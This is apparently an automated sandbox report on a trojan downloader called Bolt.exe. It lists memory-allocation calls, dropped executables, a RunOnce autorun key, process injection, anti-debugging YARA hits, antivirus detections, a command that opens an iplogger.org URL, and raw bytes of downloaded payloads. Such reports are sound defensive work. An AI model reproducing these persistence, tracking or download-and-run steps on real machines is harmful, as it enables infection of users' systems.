NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9437a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9438c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9442c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94456000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9437b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9438d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (2 events)

description	Byqibuqyqa.exe tried to sleep 138 seconds, actually delayed analysis time by 138 seconds
description	SHaedahaepahy.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe
file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe
file	C:\Program Files (x86)\Windows Sidebar\Kevideqoga.exe
file	C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1RFfM4.psd

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe
file	C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe

Drops an executable to the user AppData folder (6 events)

file	C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe
file	C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe
file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp
file	C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 10, 2022, 9:47 a.m.	process_identifier: 204 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x06c40000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 10, 2022, 9:39 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes bolt.tmp, poweroff.exe (3 events)

Time & API	Arguments	Status	Return
InternetReadFile Nov. 10, 2022, 9:46 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL§ Ùà"0\¢Nz @ @ @üyOp H.textTZ \ `.rsrcp ^@@.reloc þ@B0zHÈÐ4©,îwj?Áiº¶îrì)vÜyÐ×PRö÷Ð#ó£Ü1Wdà²6Ìu.ÖB3x³ìE3\pâw½©#y+<=°ÆzíSK.ºªFÝì2Ä¹wL^²9-wÞÿ'+i/8ÈW8Aý9j{8QKãOgÞs¼¬¼À"ûýç/g¿øÁ8ZágÏ¡Ýì½Éç¯qâÔ3ÓS´¬\|QQzÅsMaæ"Ê®¬1ÓÕ4¾M?2HØ}ªSátZ¢ø#Ú Å==·{wÚÉ$7´¥rfxÈs«÷÷Ï4ÄhhuòMM¿yZçMë0gó£åÅïQì:ÔÄox%óæôÖ£¼{ºùòé²¤(ÛôÛM1ätqInÜë[n}áYSJ®c«ÝQõ6¿©ªR}qKè£#lÿ-üjÈ"¸î0 $ºèÍ×>rÜ1wì'®Ðð¬fÙU¶àâ¾1æÃºëAúæt13þý{jÐ"wÓd×hfÕ request_handle: 0x00cc000c	1	1
recv Nov. 10, 2022, 9:39 a.m.	buffer: HTTP/1.1 200 OK content-length: 375808 x-amz-id-2: tx74466251b0704e3ca53fd-00636c4a6e accept-ranges: bytes last-modified: Fri, 04 Nov 2022 17:48:11 GMT etag: "6e4c946eceaf7b60c29fdf78df7befda" x-amz-request-id: tx74466251b0704e3ca53fd-00636c4a6e x-amz-version-id: 1667584091757177 content-type: application/octet-stream date: Thu, 10 Nov 2022 00:48:47 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELH?ecà"0~< @ @DW 8à H.text¤\| ~ `.rsrc 8 :@@.relocàº@BHÐ0tk×ÐòõçÊÒÃö²ÿ' Íü½ü²uOíüYê"QFíÛÏZ;G@æE÷E¦zGêK:h%BR6PÛÖü²K÷ ËÑ·¥¦ò 4Îç«G]Î¸¼mµªZyúÒ9^-çÏ% TçËàÖux@Ð¡ >X°£O±¡EºÀÍåÎtX¿&Ü`ô´$7-jJ±Ï 6ÑücÃ ==WÃ¼¬ø ûlMÒ¼"»g÷#{·5ç£Eö²h¥¥÷6SP [GÒÒ¿ëË;Føéãðzp6¥ÂÉ<01»¯¸Á_,¯5íÀW»ãXåõ@ÐÒÞ»îO\Kôù¸òÄ]C!ÞäÉÁHæCFSÏs÷£ÂU/LÚ8H¿y¼F¥ÚZÁ\ma¿±Ê·ÍYÅwÅãghEèÐ GxÜÐR:ôyyè£áµò&Õb¬ó&¥]pk\|Ø²ÜÀ NÚâÔÀP®./,ÁØÚdÔû±pgxºÖ4=7C!PÏcô;Ýw¿oÑtc©üx0¤lY4§=[¡¬# ½Ô¬öØBßù£^jÛ÷u¥bé.Rh4¿.CÎt¶<£±ÄøL`ÌA[v äWéPfI=s¥>ô1%ebm!±â¬ö(ôûalbeØ°ªÏ®à;ñ±4°.¬½¾×_49TÌN{H½y¸gWzhÉÑíÏJ¡ ?`ãóÈ¢õ©W]¼~·nG×$¢5ïà}Øj(ñ}#RR¸Ã]Û´¯á¶ ÇØCÂø³ïxËÿâÎ?bxõyÜ'$Ðk9)jcÐuùµåy½!Í\|â= ñëÑ»:µÖ©ÇáÕC¹ÑéÐÁLàìÌÞÝIO{°ÝTb·0ÞÚæ=ÇÁU«þ7À¿1Üejð¦ñc±=µµÞÖÁ$»`qÅH4°HúÊô@#®yãåøºM`!Í;æp[6l:äR,{¦1Mlpjï³õù&YíÕÀJ¦ÛÎª3_b#« ge\|\|ÈZ+v2ú3§niEQµ_kßËUå:oQB\Oc`XRðFaZÑÆW ®¥iÚn«ÌN tã8$PeJ[mÂ£èÈüHºx\|Ê±f<îKPKµZ~wynä«æTÓòôSòef)£@¢®zãr QáER¾qpºÏClëôYï ¡ §LTEBèg>K¾eê¨1îQMÏÃ5éø¨Îúá]Î°¦O,ßä:(RáñvaDèFr'3¸9ûuv5%ØòxUÃüãØÜãË$¸.\8 T¡½{í¶W#$Éyúóúî0àýÆì¤}ÚU!¸ä³WÐ!øù²HÃ î·ÿlùE¡þªBg¦ô(¦RU°FÈÏ?ÙLóféïcÞoRÚ¶£`)¦ÌeÉJç WáHÔyªRA{x»R÷bÙ p"tIéÒã»½´yzY÷rÆü8ÓïÝ:úWOÃ.¹³µ%'fÎðHÏqÍnÌeäde]&ån³}µÙEëîA¨ÆÂXÉE×M3WéO^êã£é´å¬rÂ$]s5p¸¾ia¡ýui÷¾·Ö7§Jv%Þ¼CB â¦$Ë~"ñJ&[O{üh»G«¨LKýäÏ,¤nÇUZlÖÝ áL>ìÆ©µ¯¶k¹< bI¹ûìCìñ!!ÔN;ôK`¦Qå=T'ôüXyøÈ{#ùíèP e8âë` 1zçñ«·õE¸ôÚwj×úýQÖ&öwð> Á$í6þÞ ';ªâ~eí¿"åéÓ2k~¨0nÑÅñùªóÖXMLÌÑãÊÑ"×+âx;½]4Üö}\ö`_û~N½yJaVtI&Ø$ñ¸±H3ö¯Ñü)â´[1[éîYÙÖ6ë®¤â øgN¸Dìn³Ãû¶ªà3ûøç~v¥ÏøñR-Ö3+ßÎóâÈÊ"HÎ5Oùx³ú7SlÞ¼cßµÕëDë`]¨5³¾TkçQPÓïqÀªÂ÷ÆøJêS¢WGà¼%'cxÒÖÅ¥Äâ,§H:>¢«ÚJ, £²©ÜäÎP>ÆAlÐµdò}¯-õd5h4ÆD2FU;²µ+ ×i¯.tÔyèÙKnxÄFÆìU ðÌ É wF7}Çù¾ ¶RÈ4¸á0Í?¦]&2 E` ôã6ÕûÞæh-¶üªzY¥Ùa received: 2920 socket: 1600	1	2920
recv Nov. 10, 2022, 9:40 a.m.	buffer: HTTP/1.1 200 OK content-length: 129024 x-amz-id-2: tx8c6723f5287b48c1a639e-00636c4a7f accept-ranges: bytes last-modified: Fri, 04 Nov 2022 17:47:51 GMT etag: "70a9b681d28137cfb4f0b4ab59ef51c6" x-amz-request-id: tx8c6723f5287b48c1a639e-00636c4a7f x-amz-version-id: 1667584071703478 content-type: application/octet-stream date: Thu, 10 Nov 2022 00:49:03 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELWúà.:º®Y `@ `@`YK@³@Y H.text´9 : `.sdataø`>@À.rsrc@³´B@@.reloc@ö@BYHÞÞU?r4$0í+ (3Á[:&-ù(! % (¢% R(¢% t(¢% â(¢% >(¢% T(¢% <(¢% N(¢% (¢% (¢% P(¢% ê(¢% ¢(¢% <(¢% ô(¢% (¢% $(¢% ¾(¢% X (¢% î (¢% (¢% "(¢% ¸(¢% R(¢% n(¢% (¢% ð(¢% (¢% , (¢% L (¢% À (¢% â (¢% (¢( (j+ (¿6DO&-ù( ( V+ (ðgI&-ù( f+ (·ghG&-ùþ (¡v+ (MÀ,4&-ùþ þ ( v+ (`>X&-ùþ þ ( B+ ('úZi&-ùB+ (óäk&-ùV+ (ùå>&-ù(îb+ (Íó6;&-ùþ ( 0-+ (që_j&-ù~%:&~þs %( À(s ( (( D(((:X& 92&( x( ((8" þþEºÿÿÿºÿÿÿ8& 8Ûÿÿÿ(Ý 9(ÜÝ8&Ý0&s (Ý 9(ÜÝ&Ý@Eß 5¾ó$ ü'#%5¾û0%0E+ (ä¦\E&-ù((:& 86(8[& 88äÿÿÿs 8×ÿÿÿ þþE9¥ÿÿÿ(9¬ÿÿÿ¼ÿÿÿN :Ðÿÿÿ& \|(( :´ÿÿÿ&s 8¢ÿÿÿ(9}ÿÿÿ 8ÿÿÿ(:X((99& 88" þþE×ÿÿÿ×ÿÿÿ8& 8ÛÿÿÿÝÝ received: 2920 socket: 1600	1	2920

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2996 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

185.213.208.196

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover

reg_value

"C:\Program Files (x86)\Windows Sidebar\Kevideqoga.exe"

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Bkav	W32.AIDetect.malware2
DrWeb	Trojan.DownLoader44.21184
Cybereason	malicious.587ddb
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Adload.NVT
APEX	Malicious
Kaspersky	UDS:Trojan-Downloader.MSIL.Csdi
SUPERAntiSpyware	Backdoor.Manuscrypt/Variant
Tencent	Win32.Trojan.Agen.Kjgl
McAfee-GW-Edition	BehavesLike.Win32.AdwareFileTour.fc
Sophos	Generic ML PUA (PUA)
Avira	HEUR/AGEN.1233171
Kingsoft	Win32.Hack.Undef.(kcloud)
Microsoft	Trojan:Script/Phonzy.A!ml
Cynet	Malicious (score: 99)
AhnLab-V3	Malware/Win32.Generic.C4341768
Malwarebytes	Trojan.Downloader
MaxSecure	Trojan.Malware.1728101.susgen
CrowdStrike	win/malicious_confidence_60% (W)

Network activity contains more than one unique useragent (2 events)

process	Bolt.tmp				useragent	InnoDownloadPlugin/1.5
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2764 resumed a thread in remote process 204
Process injection	Process 2996 resumed a thread in remote process 744
NtResumeThread Nov. 10, 2022, 9:47 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 204	1	0	0
NtResumeThread Nov. 10, 2022, 9:47 a.m.	thread_handle: 0x0000031c suspend_count: 1 process_identifier: 744	1	0	0

Generates some ICMP traffic

Bolt.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All